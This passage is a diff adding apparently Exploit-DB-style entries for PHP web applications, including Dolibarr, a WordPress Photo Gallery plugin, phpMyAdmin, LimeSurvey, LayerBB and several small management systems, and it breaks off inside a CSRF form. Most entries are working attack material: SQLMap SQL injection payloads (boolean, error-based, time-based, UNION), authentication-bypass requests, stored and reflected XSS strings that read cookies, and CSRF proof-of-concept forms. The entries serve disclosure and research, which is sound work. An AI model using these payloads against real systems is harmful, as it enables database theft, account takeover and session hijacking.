+END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
+OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
+(ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY
+x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+.
+.
+
+Parameter: availability_id (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28
+END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
+(ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY
+x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+AND (SELECT 9904 FROM
+(SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty
\ No newline at end of file
diff --git a/exploits/php/webapps/47371.txt b/exploits/php/webapps/47371.txt
new file mode 100644
index 000000000..a9f7c8c93
--- /dev/null
+++ b/exploits/php/webapps/47371.txt
@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection
+# inurl:"\wp-content\plugins\photo-gallery"
+# Date: 09-10-2019
+# Exploit Author: MTK (http://mtk911.cf/)
+# Vendor Homepage: https://10web.io/
+# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
+# Version: Up to v1.5.34
+# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap
+# CVE : 2019-16119
+
+# Software description:
+Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.
+
+
+# Technical Details & Impact:
+Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from
+them.
+
+# POC
+In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection.  Following is the POC,
+
+1.   http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&
+
+2.    http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&
+
+
+# Timeline
+09-01-2019 - Vulnerability Reported
+09-03-2019 - Vendor responded
+09-04-2019 - New version released (1.5.35)
+09-10-2019 - Full Disclosure
+
+# References:
+https://wordpress.org/plugins/photo-gallery/#developers
+https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119
\ No newline at end of file
diff --git a/exploits/php/webapps/47372.txt b/exploits/php/webapps/47372.txt
new file mode 100644
index 000000000..a1dd2ff24
--- /dev/null
+++ b/exploits/php/webapps/47372.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting
+# inurl:"\wp-content\plugins\photo-gallery"
+# Date: 09-10-2019
+# Exploit Author: MTK (http://mtk911.cf/)
+# Vendor Homepage: https://10web.io/
+# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
+# Version: Up to v1.5.34
+# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
+# CVE : 2019-16117
+
+# Software description:
+Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.
+
+
+# Technical Details & Impact:
+XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
+
+
+# POC
+
+1.    In Add Gallery/Images tab 
+2.    Edit current image gallery
+3.    In Alt/Title or Description text area add XSS payload e.g;
+<script>alert(1);</script>
+
+4.    Click Save and preview.
+5.    It will show pop-up confirming existence of XSS vulnerability 
+
+# Timeline
+09-01-2019 - Vulnerability Reported
+09-03-2019 - Vendor responded
+09-04-2019 - New version released (1.5.35)
+09-10-2019 - Full Disclosure
+
+# References:
+https://wordpress.org/plugins/photo-gallery/#developers
+https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/models/Galleries.php?old=2135029&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fmodels%2FGalleries.php
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117
\ No newline at end of file
diff --git a/exploits/php/webapps/47373.txt b/exploits/php/webapps/47373.txt
new file mode 100644
index 000000000..2f9c8ceca
--- /dev/null
+++ b/exploits/php/webapps/47373.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting
+# inurl:"\wp-content\plugins\photo-gallery"
+# Date: 09-10-2019
+# Exploit Author: MTK (http://mtk911.cf/)
+# Vendor Homepage: https://10web.io/
+# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
+# Version: Up to v1.5.34
+# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
+# CVE : 2019-16118
+
+# Software description:
+Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.
+
+
+# Technical Details & Impact:
+XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
+
+
+# POC
+
+1.    Go to options tab select watermark tab 
+2.    Select text as watermark type
+3.    Add watermark text as XSS payload e.g;
+"'><img src=a onerror='alert(2);'
+4.    Click Save.
+5.    It will show pop-up confirming existence of XSS vulnerability
+
+# Timeline
+09-01-2019 - Vulnerability Reported
+09-03-2019 - Vendor responded
+09-04-2019 - New version released (1.5.35)
+09-10-2019 - Full Disclosure
+
+# References:
+https://wordpress.org/plugins/photo-gallery/#developers
+https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Options.php?old=2142624&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FOptions.php
+https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/js/bwg.js?old=2135029&old_path=photo-gallery%2Ftrunk%2Fjs%2Fbwg.js
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118
\ No newline at end of file
diff --git a/exploits/php/webapps/47384.txt b/exploits/php/webapps/47384.txt
new file mode 100644
index 000000000..809c4c654
--- /dev/null
+++ b/exploits/php/webapps/47384.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
+Site Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# CVE: CVE-2019-16197
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
+the User-Agent HTTP header is copied into the HTML document as plain text
+between tags, leading to XSS.
+
+GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/47385.txt b/exploits/php/webapps/47385.txt
new file mode 100644
index 000000000..eb2a82d0e
--- /dev/null
+++ b/exploits/php/webapps/47385.txt
@@ -0,0 +1,79 @@
+=============================================
+MGC ALERT 2019-003
+- Original release date: June 13, 2019
+- Last revised:  September 13, 2019
+- Discovered by: Manuel Garcia Cardenas
+- Severity: 4,3/10 (CVSS Base Score)
+- CVE-ID: CVE-2019-12922
+=============================================
+
+I. VULNERABILITY
+-------------------------
+phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
+
+II. BACKGROUND
+-------------------------
+phpMyAdmin is a free software tool written in PHP, intended to handle the
+administration of MySQL over the Web. phpMyAdmin supports a wide range of
+operations on MySQL and MariaDB.
+
+III. DESCRIPTION
+-------------------------
+Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
+an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
+server in the Setup page.
+
+IV. PROOF OF CONCEPT
+-------------------------
+Exploit CSRF - Deleting main server
+
+<p>Deleting Server 1</p>
+<img src="
+http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
+style="display:none;" />
+
+V. BUSINESS IMPACT
+-------------------------
+The attacker can easily create a fake hyperlink containing the request that
+wants to execute on behalf the user,in this way making possible a CSRF
+attack due to the wrong use of HTTP method.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+phpMyAdmin <= 4.9.0.1
+
+VII. SOLUTION
+-------------------------
+Implement in each call the validation of the token variable, as already
+done in other phpMyAdmin requests.
+
+VIII. REFERENCES
+-------------------------
+https://www.phpmyadmin.net/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+June 13, 2019 1: Initial release
+September 13, 2019 2: Last revision
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
+June 13, 2019 2: Send to vendor
+July 16, 2019 3: New request to vendor without fix date
+September 13, 2019 4: Sent to lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
\ No newline at end of file
diff --git a/exploits/php/webapps/47386.txt b/exploits/php/webapps/47386.txt
new file mode 100644
index 000000000..33e0fe015
--- /dev/null
+++ b/exploits/php/webapps/47386.txt
@@ -0,0 +1,146 @@
+SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
+=======================================================================
+              title: Stored and reflected XSS vulnerabilities
+            product: LimeSurvey
+ vulnerable version: <= 3.17.13
+      fixed version: =>3.17.14
+         CVE number: CVE-2019-16172, CVE-2019-16173
+             impact: medium
+           homepage: https://www.limesurvey.org/
+              found: 2019-08-23
+                 by: Andreas Kolbeck (Office Munich)
+                     David Haintz (Office Vienna)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Europe | Asia | North America
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"LimeSurvey is the tool to use for your online surveys. Whether you are
+conducting simple questionnaires with just a couple of questions or advanced
+assessments with conditionals and quota management, LimeSurvey has got you
+covered. LimeSurvey is 100% open source and will always be transparently developed.
+We can help you reach your goals."
+
+Source: https://www.limesurvey.org/
+
+
+Business recommendation:
+------------------------
+LimeSurvey suffered from a vulnerability due to improper input
+and output validation. By exploiting this vulnerability an attacker could:
+    1. Attack other users of the web application with JavaScript code,
+       browser exploits or Trojan horses, or
+    2. perform unauthorized actions in the name of another logged-in user.
+
+The vendor provides a patch which should be installed immediately.
+Furthermore, a thorough security analysis is highly recommended as only a
+short spot check has been performed and additional issues are to be expected.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Stored and reflected XSS vulnerabilities
+LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
+which allows an attacker to execute JavaScript code with the permissions of the victim.
+In this way it is possible to escalate privileges from a low-privileged account e.g.
+to "SuperAdmin".
+
+
+Proof of concept:
+-----------------
+1) Stored and reflected XSS vulnerabilities
+Example 1 - Stored XSS (CVE-2019-16172):
+The attacker needs the appropriate permissions in order to create new survey groups.
+Then create a survey group with a JavaScript payload in the title, for example:
+
+test<svg/onload=alert(document.cookie)>
+
+When the survey group is being deleted, e.g. by an administrative user, the JavaScript
+code will be executed as part of the "success" message.
+
+
+Example 2 - Reflected XSS (CVE-2019-16173):
+The following proof of concept prints the current CSRF token cookie which contains the
+CSRF token. The parameter "surveyid" is not filtered properly:
+
+http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
+src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question
+
+
+If the URL schema is configured differently the following payload works:
+http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
+xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerabilities have been verified to exist in version 3.17.9 and the latest
+version 3.17.13. It is assumed that older versions are affected as well.
+
+
+Vendor contact timeline:
+------------------------
+2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
+2019-09-02: Fixes available:
+            https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
+            https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
+2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
+2019-09-03: Release of LimeSurvey v3.17.15 bug fix
+2019-09-12: Coordinated release of security advisory
+
+
+Solution:
+---------
+Update to version 3.17.15 or higher:
+https://www.limesurvey.org/stable-release
+
+The vendor provides a detailed list of changes here:
+https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released
+
+
+Workaround:
+-----------
+No workaround available.
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Europe | Asia | North America
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF A. Kolbeck / @2019
\ No newline at end of file
diff --git a/exploits/php/webapps/47387.txt b/exploits/php/webapps/47387.txt
new file mode 100644
index 000000000..2bd0448ff
--- /dev/null
+++ b/exploits/php/webapps/47387.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass
+# Author: Cakes
+# Discovery Date: 2019-09-14
+# Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking
+# Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip
+# Tested Version: 1.4
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Description:
+# Easy authentication bypass vulnerability on this ticket booking application 
+# allowing the attacker to remove any previously booked seats
+
+# Simply replay the below Burp request or use Curl (remember to change the Cookie Values)
+
+POST /ticket/cancel.php HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://Target/ticket/login.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 50
+Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+userid='%20or%200%3d0%20#&password=123&save=signin
\ No newline at end of file
diff --git a/exploits/php/webapps/47388.txt b/exploits/php/webapps/47388.txt
new file mode 100644
index 000000000..384acbbcc
--- /dev/null
+++ b/exploits/php/webapps/47388.txt
@@ -0,0 +1,31 @@
+# Exploit Title: College-Management-System 1.2 - Authentication Bypass
+# Author: Cakes
+# Discovery Date: 2019-09-14
+# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System
+# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip
+# Tested Version: 1.2
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Discription:
+# Easy authentication bypass vulnerability on the application 
+# allowing the attacker to log in as the school principal.
+
+# Simply replay the below Burp request or use Curl.
+# Payload: ' or 0=0 #
+
+POST /college/principalcheck.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/college/principalcheck.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+emailid='%20or%200%3d0%20#&pass=asdf
\ No newline at end of file
diff --git a/exploits/php/webapps/47395.txt b/exploits/php/webapps/47395.txt
new file mode 100644
index 000000000..67df0cf23
--- /dev/null
+++ b/exploits/php/webapps/47395.txt
@@ -0,0 +1,27 @@
+# Exploit Title: CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection
+# Author: Cakes
+# Discovery Date: 2019-09-16
+# Vendor Homepage: https://github.com/SaloniKumari123/CollegeManagementSystem
+# Software Link: https://github.com/SaloniKumari123/CollegeManagementSystem/archive/master.zip
+# Tested Version: 1.3
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Description:
+# Another College Management system coded in PHP, most input values accounted for and sanitized, except this one :-)
+
+# Parameter: batch (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause
+
+Payload: batch=-9643' OR 9247=9247-- aqgq
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: batch=2021' AND (SELECT 6451 FROM (SELECT(SLEEP(5)))CWMt)-- zEfe
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 3 columns
+
+Payload: batch=2021' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x564f6e51546c6f634741454d714e5777716d427361504d7a794b686c50657472724d616f49674b51,0x7171627171),NULL-- pPUb
\ No newline at end of file
diff --git a/exploits/php/webapps/47398.txt b/exploits/php/webapps/47398.txt
new file mode 100644
index 000000000..a7dc9f26c
--- /dev/null
+++ b/exploits/php/webapps/47398.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection
+# Author: Cakes
+# Discovery Date: 2019-09-18
+# Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management
+# Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip
+# Tested Version: 1.26
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Discription:
+# Simple SQL injection after application authentication. 
+
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: 
+
+fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: 
+
+fname=tester'||(SELECT 0x53495778 FROM DUAL WHERE 5761=5761 AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(9648=9648,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+# Payload: 
+
+fname=tester'||(SELECT 0x5144494b FROM DUAL WHERE 1043=1043 AND (SELECT 1880 FROM (SELECT(SLEEP(5)))AmmF))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add
\ No newline at end of file
diff --git a/exploits/php/webapps/47401.txt b/exploits/php/webapps/47401.txt
new file mode 100644
index 000000000..fbef2eb45
--- /dev/null
+++ b/exploits/php/webapps/47401.txt
@@ -0,0 +1,23 @@
+# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
+# Date: 2019-09-19
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: http://www.digit-rs.com/
+# Product Homepage: http://digit-rs.com/centris.html
+# Version: Every version
+# CVE : N/A
+
+# Vulnerable parameters: datum1, datum2, KID, PID 
+
+# [POST REQUEST]
+ 
+POST /korisnikinfo.php HTTP/1.1
+Content-Length: 65
+Content-Type: application/x-www-form-urlencoded
+Referer: http://host
+Host: host
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+ 
+ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"
\ No newline at end of file
diff --git a/exploits/php/webapps/47402.txt b/exploits/php/webapps/47402.txt
new file mode 100644
index 000000000..d4406236b
--- /dev/null
+++ b/exploits/php/webapps/47402.txt
@@ -0,0 +1,29 @@
+# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
+# Author: Cakes
+# Discovery Date: 2019-09-19
+# Vendor Homepage: https://goautodial.org/
+# Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso
+# Tested Version: 4.0
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Discription:
+# Simple XSS attack after application authentication. 
+
+# POST Request
+
+POST /php/CreateEvent.php HTTP/1.1
+Host: 10.0.0.25
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.25/events.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 69
+Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1
+Connection: close
+DNT: 1
+
+title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef
\ No newline at end of file
diff --git a/exploits/php/webapps/47403.html b/exploits/php/webapps/47403.html
new file mode 100644
index 000000000..53d7e3eaf
--- /dev/null
+++ b/exploits/php/webapps/47403.html
@@ -0,0 +1,532 @@
+# Exploit Title: LayerBB 1.1.3 - Multiple CSRF
+# Date: 4/7/2019
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30
+# Version: 1.1.3
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2019-16531
+
+
+1. Description:
+LayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums.
+
+
+2. Proof of Concepts:
+
+<!-- Edit Usergroup CSRF -->
+<form action="http://localhost/admin/edit_usergroup.php/id/1" method="POST" style="padding: 25px;">
+    <label for="g_name">Name</label>
+    <input type="text" name="g_name" id="g_name" value="User" class="form-control">
+    <label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>
+    <textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea>
+    <label for="b_style_s">Banner Style Start</label>
+    <textarea name="b_style_s" id="b_style_s" class="form-control"><span class="label label -default"></textarea>
+    <label for="b_style_e">Banner Style End</label>
+    <textarea name="b_style_e" id="b_style_e" class="form-control"></span></textarea>
+    <label for="permissions">Permissions</label><br>
+    <input type="checkbox" name="permissions[]" value="1" checked=""> view_forum<br><input type="checkbox" name="permissions[]" value="2" checked=""> create_thread<br><input type="checkbox" name="permissions[]" value="3" checked=""> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br>
+    <br>
+    <input type="checkbox" name="is_staff" value="1"> This Usergroup is staff.
+    <br>
+    <input type="submit" name="update" value="Save Changes" class="btn btn-default">
+</form>
+<!-- Edit Usergroup CSRF End -->
+
+<!-- Edit User CSRF -->
+<form action="http://localhost/admin/edit_user.php/id/1" method="POST" style="padding: 25px;">
+    <label for="username">Username</label>
+    <input type="text" name="username" id="username" value="Administrator" class="form-control">
+    <label for="email">Email Address</label>
+    <input type="text" name="email" id="email" value="demo@layerbb.com" class="form-control">
+    <label for="usermsg">User Message</label>
+    <input type="text" name="usermsg" id="usermsg" value="User" class="form-control">
+    <label for="signature">User Signature</label>
+    <textarea id="editor" name="signature" class="form-control" style="min-height:250px;"></textarea>
+    <label for="disabled">User Activated</label><br>
+    <input type="radio" name="disabled" value="0" checked=""> Do Not Change<br>
+    <input type="radio" name="disabled" value="0"> Active<br>
+    <input type="radio" name="disabled" value="1"> Disabled<br>
+    <br>
+    <label for="usergroup">Usergroup</label><br>
+    <select name="usergroup" id="usergroup" style="width:100%;">
+    <option value="4" selected="">Dont Change</option>
+    <option value="1">User</option><option value="2">Banned</option><option value="3">Moderator</option><option value="4">Administrator</option>
+    </select><br><br>
+    <input type="submit" name="update" value="Save Changes" class="btn btn-default">
+</form>
+<!-- Edit User CSRF End -->
+
+<!-- Edit Category CSRF -->
+<form action="http://localhost/admin/edit_category.php/id/1" method="POST" style="padding: 25px;">
+    <label for="cat_title">Title</label>
+    <input type="text" name="cat_title" id="cat_title" value="First Category" class="form-control">
+    <label for="cat_desc">Description</label>
+    <textarea name="cat_desc" id="cat_desc" class="form-control">First category on this forum!</textarea>
+    <br>
+    <label for="allowed_usergroups">Allowed Usergroups</label><br>
